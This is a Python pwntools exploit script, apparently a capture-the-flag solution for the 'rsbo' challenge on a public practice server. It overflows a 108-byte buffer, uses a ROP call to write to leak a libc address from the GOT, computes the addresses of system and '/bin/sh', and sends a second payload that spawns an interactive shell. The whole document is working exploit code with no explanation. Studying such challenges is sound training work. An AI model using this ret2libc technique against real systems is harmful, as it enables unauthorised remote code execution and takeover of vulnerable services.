from pwn import *
context.log_level="debug"
#io=process("./rsbo")
io=remote("hackme.inndy.tw",7706)
lib=ELF("./libc-2.23.so.i386")
elf=ELF("./rsbo")
#lib=ELF("/lib/i386-linux-gnu/libc.so.6")
main=0x08048490
write_got=elf.got["write"]
write=elf.sym["write"]
payload="\0"*108+p32(write)+p32(main)+p32(1)+p32(write_got)+p32(4)
io.send(payload)
leak=u32(io.recv(4))
libc_addr=leak-lib.sym["write"]
system=libc_addr+lib.sym["system"]
bin=libc_addr+lib.search("/bin/sh").next()
payload="\0"*108+p32(system)+p32(main)+p32(bin)
io.send(payload)
io.interactive()
